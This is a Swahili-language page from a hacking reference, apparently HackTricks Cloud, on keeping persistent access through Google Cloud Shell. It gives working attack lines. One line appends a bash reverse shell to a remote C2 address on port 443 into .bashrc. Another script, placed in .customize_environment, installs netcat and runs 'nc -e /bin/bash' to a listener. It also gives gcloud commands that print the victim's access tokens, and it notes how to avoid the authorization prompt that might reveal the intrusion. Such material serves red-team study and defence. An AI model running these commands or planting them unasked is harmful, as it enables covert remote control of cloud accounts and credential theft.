GCP - Cloud Shell Persistence

Jifunze & zoezi Udukuzi wa AWS:Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE) Jifunze & zoezi Udukuzi wa GCP: Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

Cloud Shell

Kwa habari zaidi angalia:

GCP - Cloud Shell Enum

Mlango wa Nyuma wa Kudumu

Google Cloud Shell inakupa ufikiaji wa mstari wa amri kwa rasilimali zako za wingu moja kwa moja kutoka kwenye kivinjari chako bila gharama yoyote inayohusiana.

Unaweza kupata Cloud Shell ya Google kutoka kwenye konsoli ya wavuti au kwa kukimbia gcloud cloud-shell ssh.

Konsoli hii ina uwezo wa kuvutia kwa wadukuzi:

Mtumiaji yeyote wa Google mwenye ufikiaji wa Google Cloud ana ufikiaji wa kipengele cha Cloud Shell kilichothibitishwa kabisa (Akaunti za Huduma zinaweza, hata ikiwa ni Wamiliki wa shirika).
Kipengele kilichotajwa kitahifadhi saraka yake ya nyumbani kwa angalau siku 120 ikiwa hakuna shughuli inayotokea.
Hakuna uwezo wa shirika kufuatilia shughuli ya kipengele hicho.

Hii kimsingi inamaanisha kwamba mshambuliaji anaweza kuweka mlango wa nyuma kwenye saraka ya nyumbani ya mtumiaji na muda mrefu kama mtumiaji anajiunganisha kwenye GC Shell kila baada ya siku 120 angalau, mlango wa nyuma utaendelea kuwepo na mshambuliaji atapata kikao kila wakati unapoendeshwa tu kwa kufanya:

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

Kuna faili nyingine katika folda ya nyumbani inayoitwa .customize_environment ambayo, ikiwepo, itatekelezwa kila wakati mtumiaji anapata shell ya wingu (kama katika mbinu iliyopita). Ingiza mlango wa nyuma uliopita au moja kama ifuatavyo kudumisha uthabiti muda mrefu mtumiaji anapotumia "mara kwa mara" shell ya wingu:

#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

Ni muhimu kutambua kwamba wakati wa kwanza kitendo kinachohitaji uthibitisho kinatekelezwa, dirisha la idhini linaloibuka katika kivinjari cha mtumiaji. Dirisha hili lazima liidhinishwe kabla ya amri kuendeshwa. Ikiwa dirisha lisilotarajiwa linaonekana, linaweza kuzua shaka na kuhatarisha njia ya uthabiti inayotumiwa.

Hii ni dirisha la idhini kutoka kwa kutekeleza gcloud projects list kutoka kwa ganda la wingu (kama mshambuliaji) inayoonekana katika kikao cha mtumiaji wa kivinjari:

Walakini, ikiwa mtumiaji ameitumia cloudshell kikamilifu, dirisha la idhini halitaonekana na unaweza kukusanya vifunguo vya mtumiaji na:

gcloud auth print-access-token
gcloud auth application-default print-access-token

Jinsi uhusiano wa SSH unavyoundwa

Kimsingi, maombi haya 3 ya API hutumiwa:

https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey [POST] (itakufanya uongeze funguo yako ya umma uliyounda kwa upande wako)
https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start [POST] (itakufanya uanzishe kipengee)
https://content-cloudshell.googleapis.com/v1/users/me/environments/default [GET] (itakwambia anwani ya IP ya ganda la Google Cloud)

Lakini unaweza kupata habari zaidi katika https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key

Marejeo

PreviousGCP - Cloud Run Persistence NextGCP - Cloud SQL Persistence

Last updated 1 month ago